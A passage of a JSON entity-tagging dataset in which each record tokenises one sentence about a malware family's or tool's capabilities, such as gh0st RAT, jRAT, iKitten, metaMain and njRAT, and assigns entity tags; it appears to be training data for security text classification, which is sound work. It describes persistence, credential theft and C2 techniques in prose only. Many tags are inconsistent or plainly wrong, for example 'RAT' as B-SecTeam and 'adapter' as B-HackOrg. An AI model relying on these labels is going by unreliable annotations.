"B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "the", "capability", "to", "list", "processes." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "gh0st", "RAT", "can", "inject", "malicious", "code", "into", "process", "created", "by", "the", "“Command_Create&Inject”", "function." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "checked", "for", "the", "existence", "of", "a", "Service", "key", "to", "determine", "if", "it", "has", "already", "been", "installed", "on", "the", "system." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "added", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "gh0st", "RAT", "variant", "has", "used", "rundll32", "for", "execution." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "can", "capture", "the", "victim’s", "screen", "remotely." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "can", "execute", "its", "service", "if", "the", "Service", "key", "exists.", "If", "the", "key", "does", "not", "exist,", "gh0st", "RAT", "will", "create", "and", "run", "the", "service." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "gh0st", "RAT", "can", "load", "DLLs", "into", "memory." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "used", "Zlib", "to", "compress", "C2", "communications", "data", "before", "encrypting", "it." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "uses", "RC4", "and", "XOR", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "gathered", "system", "architecture,", "processor,", "OS", "configuration,", "and", "installed", "hardware", "information." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "can", "create", "a", "new", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gsecdump", "can", "dump", "LSA", "secrets." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "gsecdump", "can", "dump", "Windows", "password", "hashes", "from", "the", "SAM." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hcdLoader", "provides", "command-line", "access", "to", "the", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hcdLoader", "installs", "itself", "as", "a", "service", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "httpclient", "encrypts", "C2", "content", "with", "XOR", "using", "a", "single", "byte,", "0x12." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "httpclient", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "httpclient", "opens", "cmd.exe", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "iKitten", "will", "zip", "up", "the", "/Library/Keychains", "directory", "before", "exfiltrating", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "iKitten", "prompts", "the", "user", "for", "their", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "iKitten", "saves", "itself", "with", "a", "leading", "\".\"", "so", "that", "it's", "hidden", "from", "users", "by", "default." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "iKitten", "collects", "the", "keychains", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "iKitten", "lists", "the", "current", "processes", "running." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "iKitten", "adds", "an", "entry", "to", "the", "rc.common", "file", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "iKitten", "will", "look", "for", "the", "current", "IP", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ifconfig", "can", "be", "used", "to", "display", "adapter", "configuration", "on", "Unix", "systems,", "including", "information", "for", "TCP/IP,", "DNS,", "and", "DHCP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "ipconfig", "can", "be", "used", "to", "display", "adapter", "configuration", "on", "Windows", "systems,", "including", "information", "for", "TCP/IP,", "DNS,", "and", "DHCP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "jRAT", "can", "capture", "microphone", "recordings." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "jRAT", "can", "capture", "clipboard", "data." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "jRAT", "can", "capture", "passwords", "from", "common", "chat", "applications", "such", "as", "MSN", "Messenger,", "AOL,", "Instant", "Messenger,", "and", "and", "Google", "Talk." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Way", "B-Tool", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "jRAT", "can", "capture", "passwords", "from", "common", "web", "browsers", "such", "as", "Internet", "Explorer,", "Google", "Chrome,", "and", "Firefox." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "jRAT", "has", "a", "function", "to", "delete", "files", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "browse", "file", "systems." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "jRAT", "can", "download", "and", "execute", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "jRAT", "has", "been", "distributed", "as", "HTA", "files", "with", "JScript." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "jRAT", "has", "the", "capability", "to", "log", "keystrokes", "from", "the", "victim’s", "machine,", "both", "offline", "and", "online." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT’s", "Java", "payload", "is", "encrypted", "with", "AES.", "Additionally,", "backdoor", "files", "are", "encrypted", "using", "DES", "as", "a", "stream", "cipher.", "Later", "variants", "of", "jRAT", "also", "incorporated", "AV", "evasion", "methods", "such", "as", "Java", "bytecode", "obfuscation", "via", "the", "commercial", "Allatori", "obfuscation", "tool." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "map", "UPnP", "ports." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "steal", "keys", "for", "VPNs", "and", "cryptocurrency", "wallets." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "query", "and", "kill", "system", "processes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "jRAT", "can", "serve", "as", "a", "SOCKS", "proxy", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "jRAT", "can", "support", "RDP", "control." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O" ] }, { "tokens": [ "jRAT", "can", "be", "configured", "to", "reconnect", "at", "certain", "intervals." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "has", "the", "capability", "to", "take", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "list", "security", "software,", "such", "as", "by", "using", "WMIC", "to", "identify", "anti-virus", "products", "installed", "on", "the", "victim’s", "machine", "and", "to", "obtain", "firewall", "details." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "payloads", "have", "been", "packed." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "list", "and", "manage", "startup", "entries." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "jRAT", "collects", "information", "about", "the", "OS", "(version,", "build", "type,", "install", "date)", "as", "well", "as", "system", "up-time", "upon", "receiving", "a", "connection", "from", "a", "backdoor." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "gather", "victim", "internal", "and", "external", "IPs." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "can", "list", "network", "connections." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "jRAT", "can", "list", "local", "services." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "jRAT", "has", "the", "capability", "to", "capture", "video", "from", "a", "webcam." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "jRAT", "has", "been", "distributed", "as", "HTA", "files", "with", "VBScript." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "jRAT", "has", "command", "line", "access." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "jRAT", "uses", "WMIC", "to", "identify", "anti-virus", "products", "installed", "on", "the", "victim’s", "machine", "and", "to", "obtain", "firewall", "details." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "used", "`osascript`", "to", "call", "itself", "via", "the", "`do", "shell", "script`", "command", "in", "the", "Launch", "Agent", "`.plist`", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "searched", "for", "the", "Activity", "Monitor", "process", "in", "the", "System", "Events", "process", "list", "and", "kills", "the", "process", "if", "running.", "macOS.OSAMiner", "also", "searches", "the", "operating", "system's", "`install.log`", "for", "apps", "matching", "its", "hardcoded", "list,", "killing", "all", "matching", "process", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "embedded", "Stripped", "Payloads", "within", "another", "run-only", "Stripped", "Payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "macOS.OSAMiner", "has", "used", "`curl`", "to", "download", "a", "Stripped", "Payloads", "from", "a", "public", "facing", "adversary-controlled", "webpage." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "placed", "a", "Stripped", "Payloads", "with", "a", "`plist`", "extension", "in", "the", "Launch", "Agent's", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Exp", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "used", "`launchctl`", "to", "restart", "the", "Launch", "Agent." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "used", "`ps", "ax", "|", "grep", "<name>", "|", "grep", "-v", "grep", "|", "...`", "and", "`ps", "ax", "|", "grep", "-E...`", "to", "conduct", "process", "discovery." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "has", "used", "run-only", "Applescripts,", "a", "compiled", "and", "stripped", "version", "of", "AppleScript,", "to", "remove", "human", "readable", "indicators", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "can", "parse", "the", "output", "of", "the", "native", "`system_profiler`", "tool", "to", "determine", "if", "the", "machine", "is", "running", "with", "4", "cores." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "macOS.OSAMiner", "can", "gather", "the", "device", "serial", "number", "and", "has", "checked", "to", "ensure", "there", "is", "enough", "disk", "space", "using", "the", "Unix", "utility", "`df`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "meek", "uses", "Domain", "Fronting", "to", "disguise", "the", "destination", "of", "network", "traffic", "as", "another", "server", "that", "is", "hosted", "in", "the", "same", "Content", "Delivery", "Network", "(CDN)", "as", "the", "intended", "destination." ], "ner_tags": [ "O", "O", "B-Tool", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "used", "XOR-based", "encryption", "for", "collected", "files", "before", "exfiltration." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "support", "an", "HKCMD", "sideloading", "start", "method." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "collect", "files", "and", "system", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "decrypt", "and", "load", "other", "modules." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain's", "module", "file", "has", "been", "encrypted", "via", "XOR." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "upload", "collected", "files", "and", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "deleted", "collected", "items", "after", "uploading", "the", "content", "to", "its", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "recursively", "enumerate", "files", "in", "an", "operator-provided", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "download", "files", "onto", "compromised", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "log", "mouse", "events." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O" ] }, { "tokens": [ "metaMain", "can", "create", "a", "named", "pipe", "to", "listen", "for", "and", "send", "data", "to", "a", "named", "pipe-based", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "the", "ability", "to", "log", "keyboard", "events." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "metaMain", "has", "stored", "the", "collected", "system", "files", "in", "a", "working", "directory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "write", "the", "process", "ID", "of", "a", "target", "process", "into", "the", "`HKEY_LOCAL_MACHINE\\SOFTWARE\\DDE\\tpid`", "Registry", "value", "as", "part", "of", "its", "reflective", "loading", "activity." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "execute", "an", "operator-provided", "Windows", "command", "by", "leveraging", "functions", "such", "as", "`WinExec`,", "`WriteFile`,", "and", "`ReadFile`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "metaMain", "can", "establish", "an", "indirect", "and", "raw", "TCP", "socket-based", "connection", "to", "the", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "authenticated", "itself", "to", "a", "different", "implant,", "Cryshell,", "through", "a", "port", "knocking", "and", "handshake", "procedure." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "metaMain", "can", "enumerate", "the", "processes", "that", "run", "on", "the", "platform." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "inject", "the", "loader", "file,", "Speech02.db,", "into", "a", "process." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "reflectively", "loaded", "a", "DLL", "to", "read,", "decrypt,", "and", "load", "an", "orchestrator", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "take", "and", "save", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "metaMain", "can", "encrypt", "the", "data", "that", "it", "sends", "and", "receives", "from", "the", "C2", "server", "using", "an", "RC4", "encryption", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "collect", "the", "computer", "name", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "has", "delayed", "execution", "for", "five", "to", "six", "minutes", "during", "its", "persistence", "establishment", "process." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "change", "the", "`CreationTime`,", "`LastAccessTime`,", "and", "`LastWriteTime`", "file", "time", "attributes", "when", "executed", "with", "`SYSTEM`", "privileges." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "metaMain", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "metaMain", "registered", "a", "WMI", "event", "subscription", "consumer", "called", "\"hard_disk_stat\"", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "nbtstat", "can", "be", "used", "to", "discover", "local", "NetBIOS", "domain", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "nbtstat", "can", "be", "used", "to", "discover", "current", "NetBIOS", "sessions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "netsh", "can", "be", "used", "to", "disable", "local", "firewall", "settings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "netsh", "can", "be", "used", "as", "a", "persistence", "proxy", "technique", "to", "execute", "a", "helper", "DLL", "when", "netsh.exe", "is", "executed." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-HackOrg", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "netsh", "can", "be", "used", "to", "set", "up", "a", "proxy", "tunnel", "to", "allow", "remote", "host", "access", "to", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "netsh", "can", "be", "used", "to", "discover", "system", "firewall", "settings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "netstat", "can", "be", "used", "to", "enumerate", "local", "network", "connections,", "including", "active", "TCP", "connections", "and", "other", "network", "statistics." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ngrok", "can", "provide", "DGA", "for", "C2", "servers", "through", "the", "use", "of", "random", "URL", "strings", "that", "change", "every", "12", "hours." ], "ner_tags": [ "B-SamFile", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ngrok", "has", "been", "used", "by", "threat", "actors", "to", "configure", "servers", "for", "data", "exfiltration." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "I-Purp", "O" ] }, { "tokens": [ "ngrok", "can", "tunnel", "RDP", "and", "other", "services", "securely", "over", "internet", "connections." ], "ner_tags": [ "B-SamFile", "O", "I-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ngrok", "can", "be", "used", "to", "proxy", "connections", "to", "machines", "located", "behind", "NAT", "or", "firewalls." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ngrok", "has", "been", "used", "by", "threat", "actors", "to", "proxy", "C2", "connections", "to", "ngrok", "service", "subdomains." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "njRAT", "gathers", "information", "about", "opened", "windows", "during", "the", "initial", "infection." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "is", "capable", "of", "manipulating", "and", "deleting", "registry", "keys,", "including", "those", "used", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "AutoIt", "to", "compile", "the", "payload", "and", "main", "script", "into", "a", "single", "executable", "after", "delivery." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "a", "module", "that", "steals", "passwords", "saved", "in", "victim", "web", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "can", "collect", "data", "from", "a", "local", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "modified", "the", "Windows", "firewall", "to", "allow", "itself", "to", "communicate", "through", "the", "firewall." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "included", "a", "base64", "encoded", "executable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "HTTP", "to", "receive", "stolen", "information", "from", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "a", "fast", "flux", "DNS", "for", "C2", "IP", "resolution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "is", "capable", "of", "deleting", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "njRAT", "can", "browse", "file", "systems", "using", "a", "file", "manager", "module." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "njRAT", "can", "download", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "is", "capable", "of", "logging", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "njRAT", "can", "create,", "delete,", "or", "modify", "a", "specified", "Registry", "key", "or", "value." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "the", "ShellExecute()", "function", "within", "a", "script." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "used", "port", "1177", "for", "HTTP", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "will", "attempt", "to", "detect", "if", "the", "victim", "system", "has", "a", "camera", "during", "the", "initial", "infection.", "njRAT", "can", "also", "detect", "any", "removable", "drives", "connected", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "njRAT", "has", "executed", "PowerShell", "commands", "via", "auto-run", "registry", "key", "persistence." ], "ner_tags": [ "B-SamFile", "O", 